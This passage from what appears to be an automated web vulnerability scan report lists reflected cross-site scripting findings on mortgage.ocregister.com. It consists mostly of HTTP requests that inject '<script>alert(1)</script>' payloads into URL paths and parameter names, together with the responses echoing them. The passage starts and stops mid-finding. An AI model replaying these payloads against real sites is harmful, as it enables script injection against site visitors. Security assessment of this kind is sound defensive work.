<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008a8d08\"><script>alert(1)</script>16a3cd6aa1d/08/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b270c"><script>alert(1)</script>13e7c115bbc was submitted in the REST URL parameter 2. This input was echoed as b270c\"><script>alert(1)</script>13e7c115bbc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/08b270c"><script>alert(1)</script>13e7c115bbc/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:10 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/08b270c\"><script>alert(1)</script>13e7c115bbc/feed/" /> ...[SNIP]...
1.267. http://mortgage.ocregister.com/2008/08/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2008/08/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d635"><script>alert(1)</script>be7b47f3057 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d635\"><script>alert(1)</script>be7b47f3057 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/08/?5d635"><script>alert(1)</script>be7b47f3057=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/08/?5d635\"><script>alert(1)</script>be7b47f3057=1feed/" /> ...[SNIP]...
1.268. http://mortgage.ocregister.com/2008/08/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2008/08/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d8d85'><script>alert(1)</script>758d680b117 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d8d85\\\'><script>alert(1)</script>758d680b117 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/08/?d8d85'><script>alert(1)</script>758d680b117=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93022
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <a href='/2008/08/?d8d85\\\'><script>alert(1)</script>758d680b117=1&dem_add_user_answer=true&dem_poll_id=31' rel='nofollow' onclick='return dem_addAnswer(this)' class='dem-add-answer'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd248"><script>alert(1)</script>480904c2d4d was submitted in the REST URL parameter 1. This input was echoed as cd248\"><script>alert(1)</script>480904c2d4d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008cd248"><script>alert(1)</script>480904c2d4d/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008cd248\"><script>alert(1)</script>480904c2d4d/09/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c5ee"><script>alert(1)</script>57e09d4d961 was submitted in the REST URL parameter 2. This input was echoed as 4c5ee\"><script>alert(1)</script>57e09d4d961 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/094c5ee"><script>alert(1)</script>57e09d4d961/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/094c5ee\"><script>alert(1)</script>57e09d4d961/feed/" /> ...[SNIP]...
1.271. http://mortgage.ocregister.com/2008/09/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2008/09/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f1dce'><script>alert(1)</script>c8a81c077b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1dce\\\'><script>alert(1)</script>c8a81c077b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/09/?f1dce'><script>alert(1)</script>c8a81c077b7=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 112237
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <a href='/2008/09/?f1dce\\\'><script>alert(1)</script>c8a81c077b7=1&dem_add_user_answer=true&dem_poll_id=34' rel='nofollow' onclick='return dem_addAnswer(this)' class='dem-add-answer'> ...[SNIP]...
1.272. http://mortgage.ocregister.com/2008/09/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2008/09/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e00c"><script>alert(1)</script>73475f88de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e00c\"><script>alert(1)</script>73475f88de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/09/?2e00c"><script>alert(1)</script>73475f88de=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 112212
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/09/?2e00c\"><script>alert(1)</script>73475f88de=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e3b3"><script>alert(1)</script>c80cc7f5054 was submitted in the REST URL parameter 1. This input was echoed as 7e3b3\"><script>alert(1)</script>c80cc7f5054 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20087e3b3"><script>alert(1)</script>c80cc7f5054/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:09 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20087e3b3\"><script>alert(1)</script>c80cc7f5054/10/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0d1"><script>alert(1)</script>8fa7ed5b19f was submitted in the REST URL parameter 2. This input was echoed as bf0d1\"><script>alert(1)</script>8fa7ed5b19f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/10bf0d1"><script>alert(1)</script>8fa7ed5b19f/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/10bf0d1\"><script>alert(1)</script>8fa7ed5b19f/feed/" /> ...[SNIP]...
1.275. http://mortgage.ocregister.com/2008/10/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2008/10/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae4c"><script>alert(1)</script>170041f3cf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eae4c\"><script>alert(1)</script>170041f3cf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/10/?eae4c"><script>alert(1)</script>170041f3cf9=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 110972
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/10/?eae4c\"><script>alert(1)</script>170041f3cf9=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc1b"><script>alert(1)</script>2d130c53a29 was submitted in the REST URL parameter 1. This input was echoed as 6fc1b\"><script>alert(1)</script>2d130c53a29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20086fc1b"><script>alert(1)</script>2d130c53a29/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:09 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20086fc1b\"><script>alert(1)</script>2d130c53a29/11/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3cd6"><script>alert(1)</script>c5248f34aad was submitted in the REST URL parameter 2. This input was echoed as b3cd6\"><script>alert(1)</script>c5248f34aad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/11b3cd6"><script>alert(1)</script>c5248f34aad/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/11b3cd6\"><script>alert(1)</script>c5248f34aad/feed/" /> ...[SNIP]...
1.278. http://mortgage.ocregister.com/2008/11/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2008/11/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59bc7"><script>alert(1)</script>a0f4b09cc80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59bc7\"><script>alert(1)</script>a0f4b09cc80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/11/?59bc7"><script>alert(1)</script>a0f4b09cc80=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109418
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/11/?59bc7\"><script>alert(1)</script>a0f4b09cc80=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb99f"><script>alert(1)</script>73505128c2a was submitted in the REST URL parameter 1. This input was echoed as fb99f\"><script>alert(1)</script>73505128c2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008fb99f"><script>alert(1)</script>73505128c2a/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008fb99f\"><script>alert(1)</script>73505128c2a/12/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f6bd"><script>alert(1)</script>e08417cca0d was submitted in the REST URL parameter 2. This input was echoed as 9f6bd\"><script>alert(1)</script>e08417cca0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/129f6bd"><script>alert(1)</script>e08417cca0d/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
